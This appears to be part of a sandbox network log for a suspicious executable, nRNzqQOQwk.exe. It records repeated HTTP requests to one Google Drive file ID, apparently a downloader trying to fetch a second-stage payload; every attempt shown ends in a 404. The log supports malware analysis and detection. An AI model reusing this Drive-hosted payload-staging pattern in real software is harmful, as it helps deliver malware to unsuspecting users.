2025-01-10 14:37:48 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:37:49 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4VlvnoEekSOfmMSxe5xbyRRgA3NbP9YSK1vrPVVLQnQJXVfTpZ7cs91oAyXGZeO9sD
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:48 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-d59Pk4tclHO7Lv-r60pu_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
2025-01-10 14:37:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CYMm6bjUqhB99nV3lhBEmw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.11.20 | 49808 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:37:59 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:37:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:59 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-tue5Bffo7-VM8FeJ8tQkIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.11.20 | 49809 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:37:59 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:38:00 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC59sotPYdc6k18dPqK7hPyfDpAs3BS1ns8BEg1Q4A2wuXhM8_BmqZhtek_Pz-QZuwQR
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:00 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-cjjRN4_ZjqFy-a7rYTDLUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
2025-01-10 14:38:00 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cWhiBZMXMJsShENr-GsFQA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.11.20 | 49810 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:38:10 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:38:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:10 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-fJO-Ln3HTM1BeBcRjnslRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.11.20 | 49811 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:38:11 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:11 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5XJJtrVA6kNHjGAk7wjc16t8MWDfSPpR2BwqlHcwg9ctq4yD-dG1a02ZyxeP2DNeVaJDB1k9g
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:11 GMT
                                                                          Content-Security-Policy: script-src 'nonce-JmpaSkKhCT82CkoBuI9M0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pUUwBl5PLmtLRbpvimFXDg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          66 | 192.168.11.20 | 49812 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:21 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:21 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-YJW5ehhEr_1aI8BG1S_nPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          67 | 192.168.11.20 | 49813 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:22 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:22 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4USTthsUGV3EuylFkh-2vBtRRMRvC6AOV7JyO0IW9kDGcc7Nz3811iyd4SSUlZyezBeVPBSoE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:22 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-f1wcMSF50eix_uAYV4hNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:22 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="In9q_cNMtrZy7SdpFj7iqw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          68 | 192.168.11.20 | 49814 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:32 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:33 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-7yazehcfmuoxveyamUt91g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          69 | 192.168.11.20 | 49815 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:33 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6VT7SqsEAXFXI3gxlBVIYxVvkTmYV-99KGo9FoVCTCN1ocLk0vaLGYUmzOLOMuNqhg
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:33 GMT
                                                                          Content-Security-Policy: script-src 'nonce-ewITGIgRhDbS9Uenfm61xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
